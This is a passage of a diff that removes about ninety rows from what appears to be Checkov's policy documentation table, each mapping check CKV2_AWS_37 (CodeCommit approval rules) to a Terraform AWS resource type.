-|  881 | CKV2_AWS_37              | resource                         | aws_ami                                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  882 | CKV2_AWS_37              | resource                         | aws_ami_copy                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  883 | CKV2_AWS_37              | resource                         | aws_ami_from_instance                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  884 | CKV2_AWS_37              | resource                         | aws_ami_launch_permission                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  885 | CKV2_AWS_37              | resource                         | aws_api_gateway_account                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  886 | CKV2_AWS_37              | resource                         | aws_api_gateway_api_key                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  887 | CKV2_AWS_37              | resource                         | aws_api_gateway_authorizer                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  888 | CKV2_AWS_37              | resource                         | aws_api_gateway_base_path_mapping                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  889 | CKV2_AWS_37              | resource                         | aws_api_gateway_client_certificate                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  890 | CKV2_AWS_37              | resource                         | aws_api_gateway_deployment                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  891 | CKV2_AWS_37              | resource                         | aws_api_gateway_documentation_part                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  892 | CKV2_AWS_37              | resource                         | aws_api_gateway_documentation_version                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  893 | CKV2_AWS_37              | resource                         | aws_api_gateway_domain_name                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  894 | CKV2_AWS_37              | resource                         | aws_api_gateway_gateway_response                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  895 | CKV2_AWS_37              | resource                         | aws_api_gateway_integration                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  896 | CKV2_AWS_37              | resource                         | aws_api_gateway_integration_response                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  897 | CKV2_AWS_37              | resource                         | aws_api_gateway_method                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  898 | CKV2_AWS_37              | resource                         | aws_api_gateway_method_response                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  899 | CKV2_AWS_37              | resource                         | aws_api_gateway_method_settings                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  900 | CKV2_AWS_37              | resource                         | aws_api_gateway_model                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  901 | CKV2_AWS_37              | resource                         | aws_api_gateway_request_validator                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  902 | CKV2_AWS_37              | resource                         | aws_api_gateway_resource                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  903 | CKV2_AWS_37              | resource                         | aws_api_gateway_rest_api                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  904 | CKV2_AWS_37              | resource                         | aws_api_gateway_stage                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  905 | CKV2_AWS_37              | resource                         | aws_api_gateway_usage_plan                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  906 | CKV2_AWS_37              | resource                         | aws_api_gateway_usage_plan_key                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  907 | CKV2_AWS_37              | resource                         | aws_api_gateway_vpc_link                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  908 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_api                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  909 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_api_mapping                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  910 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_authorizer                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  911 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_deployment                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  912 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_domain_name                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  913 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_integration                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  914 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_integration_response                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  915 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_model                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  916 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_route                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  917 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_route_response                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  918 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_stage                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  919 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_vpc_link                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  920 | CKV2_AWS_37              | resource                         | aws_app_cookie_stickiness_policy                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  921 | CKV2_AWS_37              | resource                         | aws_appautoscaling_policy                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  922 | CKV2_AWS_37              | resource                         | aws_appautoscaling_scheduled_action                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  923 | CKV2_AWS_37              | resource                         | aws_appautoscaling_target                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  924 | CKV2_AWS_37              | resource                         | aws_appmesh_mesh                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  925 | CKV2_AWS_37              | resource                         | aws_appmesh_route                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  926 | CKV2_AWS_37              | resource                         | aws_appmesh_virtual_node                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  927 | CKV2_AWS_37              | resource                         | aws_appmesh_virtual_router                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  928 | CKV2_AWS_37              | resource                         | aws_appmesh_virtual_service                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  929 | CKV2_AWS_37              | resource                         | aws_appsync_api_key                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  930 | CKV2_AWS_37              | resource                         | aws_appsync_datasource                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  931 | CKV2_AWS_37              | resource                         | aws_appsync_function                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  932 | CKV2_AWS_37              | resource                         | aws_appsync_graphql_api                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  933 | CKV2_AWS_37              | resource                         | aws_appsync_resolver                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  934 | CKV2_AWS_37              | resource                         | aws_athena_database                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  935 | CKV2_AWS_37              | resource                         | aws_athena_named_query                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  936 | CKV2_AWS_37              | resource                         | aws_athena_workgroup                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  937 | CKV2_AWS_37              | resource                         | aws_autoscaling_attachment                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  938 | CKV2_AWS_37              | resource                         | aws_autoscaling_group                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  939 | CKV2_AWS_37              | resource                         | aws_autoscaling_lifecycle_hook                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  940 | CKV2_AWS_37              | resource                         | aws_autoscaling_notification                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  941 | CKV2_AWS_37              | resource                         | aws_autoscaling_policy                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  942 | CKV2_AWS_37              | resource                         | aws_autoscaling_schedule                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  943 | CKV2_AWS_37              | resource                         | aws_backup_plan                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  944 | CKV2_AWS_37              | resource                         | aws_backup_selection                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  945 | CKV2_AWS_37              | resource                         | aws_backup_vault                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  946 | CKV2_AWS_37              | resource                         | aws_batch_compute_environment                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  947 | CKV2_AWS_37              | resource                         | aws_batch_job_definition                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  948 | CKV2_AWS_37              | resource                         | aws_batch_job_queue                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  949 | CKV2_AWS_37              | resource                         | aws_budgets_budget                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  950 | CKV2_AWS_37              | resource                         | aws_cloud9_environment_ec2                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  951 | CKV2_AWS_37              | resource                         | aws_cloudformation_stack                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  952 | CKV2_AWS_37              | resource                         | aws_cloudformation_stack_set                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  953 | CKV2_AWS_37              | resource                         | aws_cloudformation_stack_set_instance                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  954 | CKV2_AWS_37              | resource                         | aws_cloudfront_distribution                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  955 | CKV2_AWS_37              | resource                         | aws_cloudfront_origin_access_identity                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  956 | CKV2_AWS_37              | resource                         | aws_cloudfront_public_key                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  957 | CKV2_AWS_37              | resource                         | aws_cloudhsm_v2_cluster                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  958 | CKV2_AWS_37              | resource                         | aws_cloudhsm_v2_hsm                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  959 | CKV2_AWS_37              | resource                         | aws_cloudtrail                                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  960 | CKV2_AWS_37              | resource                         | aws_cloudwatch_dashboard                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  961 | CKV2_AWS_37              | resource                         | aws_cloudwatch_event_permission                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  962 | CKV2_AWS_37              | resource                         | aws_cloudwatch_event_rule                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  963 | CKV2_AWS_37              | resource                         | aws_cloudwatch_event_target                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  964 | CKV2_AWS_37              | resource                         | aws_cloudwatch_log_destination                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  965 | CKV2_AWS_37              | resource                         | aws_cloudwatch_log_destination_policy                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  966 | CKV2_AWS_37              | resource                         | aws_cloudwatch_log_group                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  967 | CKV2_AWS_37              | resource                         | aws_cloudwatch_log_metric_filter                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  968 | CKV2_AWS_37              | resource                         | aws_cloudwatch_log_resource_policy                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  969 | CKV2_AWS_37              | resource                         | aws_cloudwatch_log_stream                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  970 | CKV2_AWS_37              | resource                         | aws_cloudwatch_log_subscription_filter                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
